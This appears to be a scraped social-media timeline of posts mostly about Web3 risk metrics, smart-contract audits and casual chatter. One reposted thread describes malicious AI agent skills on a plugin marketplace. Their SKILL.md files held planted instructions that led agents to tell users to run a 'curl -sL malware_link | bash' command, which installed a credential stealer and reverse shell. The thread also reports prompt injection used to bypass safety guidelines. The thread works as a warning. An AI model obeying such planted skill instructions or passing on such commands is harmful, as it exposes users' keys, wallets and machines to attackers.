johnnieskywalker

@thedarshakrana Isn't this IRL GTA effect? 😅

I just read about a phenomenon I can't stop thinking about: "The Red Car Theory" Once you understand it, you'll see it EVERYWHERE. And it will change how you view reality forever. Here's why:🧵

CORE3 methodology is probably the nerdiest in Web3, because $SKY scored “better” than $ETH on the probability of loss. Here's how 1 metric changes every subcategory score 👇 Comparison and explanation in thread 🧵

Exactly right, @Core3io the first appearance happened at @UN conference Another reminder to support not just CORE3.io , but at least 5 more project to make web3 better and secure qf.giveth.io/project/core3-… @griffgreen @jchaskin22

Compare projects on risk exposure That's basically what CORE3 is for

These are the 5 DeFi projects with lowest risk exposure on the planet right now. ethereum:0x56072c95faa701256059aa122697b133aded9279 solana:AavE1kKKnesPw4MuRJmJ9jZs9QzEE8CPxQ3ViczUDfc1 $MLN ethereum:0xfe0c30065b384f05761f15d0cc899d4f9f9cc0eb ethereum:0x8207c1ffc5b6804f6024322ccf34f29c3541ae26 Now look closer. 4 of 5 have no disclosed audit coverage on critical contracts. 5 of 5 scored poorly on server security. Even the best exposes you to some risks that are not obvious at first glance. 2018-2026 was an all-in marketing arc for crypto. Therefore, even the safest capital-harbors carry some skeletons in their closets. You’re ready for this topic. Welcome to the real state of crypto risk. Breakdown ⬇️

CORE3 is taking its first open‑source step. Today, we are releasing the Probability of Loss detectors under the AGPLv3 license. This means anyone can now: • Experiment with measuring risk in their own stack using PoL detectors • Inspect how PoL detectors work • Propose new signals and improvements • Build services on top, as long as improvements stay open to the ecosystem This is a small but important part of the PoL engine, and our first move toward treating risk infrastructure as a public good for Web3. PoL is a standard builders can start auditing and improving, not something to worship or fear. We work to standardize risk, so the market can speak a shared risk language. This is our first, partially open‑source step toward a transparent, forkable, industry‑driven risk standard. Code and README: github.com/hai-group/core…

🔵 The Q1 2026 Security & Compliance Report is out. Built with input from @kucoincom, @MEXC, @GlobalLedger, @WhiteBit, @centrifuge, @svrn_ai, @LearnMoreWithC4, @AnalyticsGray, @m0, @AlliumLabs, @Bybit_Official – alongside Hacken. Get the full report: hackenio.cc/q1-2026-securi…

Five statements from @buda_kyiv for the industry: 1. Current smart contract audits are more marketing and less security instruments. Projects opt for narrow coverage and, at the same time, miss other practices that help spot and prevent exploits beyond the code plane. 2. Hackers don't target just code. People remain the weakest link: misconfigured tools, overprivileged access, social engineering, and unrevoked keys. These drained 75% of Web3's capital in 2025. 3. “Ship fast, break things” works both ways. Today, things break after you ship fast. Risk cannot be overlooked. When a founder fails due to an avoidable exploit, they don't get fined; they usually just start over. 4. Industry lacks transparent risk metrics. Users and institutions must guess or stay in the safe harbor of stablecoins. CORE3 aims to shift the equation in favor of all parties seeking risk transparency. 5. DeFi is not what it seems. Many so-called protocols have their keys in the founders' pockets, making them CeFi, prone to exploits or manipulation, and not DeFi at all.

70.87/100 (low confidence) — Initial Web3 industry-wide average Probability of Loss CORE3 at ETHCC Cannes: Risk data for 1,426 projects and 253 exchanges goes public CORE3 releases one of the largest public risk datasets in Web3: 1,426 projects and 253 exchanges, indexed by probability of loss across a custom set of assessments spanning 8 risk domains. Starting today, funds, listing teams, builders, and researchers can, for the first time, compare risk across the industry as a whole, project categories, or separate projects using the same scale. Our message to the blockchain industry: The industry is now bleeding out more capital due to a thousand cuts of overlooked risk practices than it does to grand-heist hacks. Before CORE3, there was no open infrastructure to measure risk exposure. But with a unified risk benchmark, Web3 can self-regulate into a risk-aware, accountable ecosystem. Our call to action: 📢 Share it with projects you're in to make risk visible. 🔬 Challenge the methodology so it gets stronger. 🤝 Integrate PoL to show your users real risk data. core3.io

@ThePrimeagen Do you know origin of this meme?

Secure development is becoming standard in Web3. But risk hasn’t disappeared. It has shifted into upgrades, edge cases, and operational blind spots. Our 2025 Secure Software Development Life Cycle Maturity Survey shows how and where. Get the report: hackenio.cc/4lLNm6o

@izgnzlz fingers crossed

Saw this on Hacker News today: Someone reverse engineered a game from 1983 called 📈 Wall Street Raiders, it was 115,000 lines of BASIC so indecipherable that even Disney couldn't figure out how to wallstreetraider.com/story.html It's essentially a very deep granular trading simulator where you're a corporate raider, buying and selling companies, and many CEOs and investment managers said they used the strategies they learnt in the game in the real world! So I installed it for you to play on pieter.com!

Happy birthday indeed! ❤️

They're not stealing credentials anymore. They're stealing your AI's model of who you are. 20% of skills poisoned on @openclaw. Now someone wants to give these AI agents access to bank accounts. The weaponization phase has begun. rekt.news/identity-theft…

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

🚨 Planning a smart contract audit in 2026? Poor prep can lead to delayed launches, low-impact findings, and higher costs later. Our 5-step checklist gets you audit-ready from day one – reduce surprises, save time, and boost quality. 📥 Get your copy: hackenio.cc/sca-readiness-…

@PavelSlunkin Time flies differently in different parts of Earth

“Luke, I am your father.”

@levelsio It also has some unusual ethnic mix that not so many people know about

🦫 Did you know Curitiba in Brazil has capybaras that walk around freely in the park?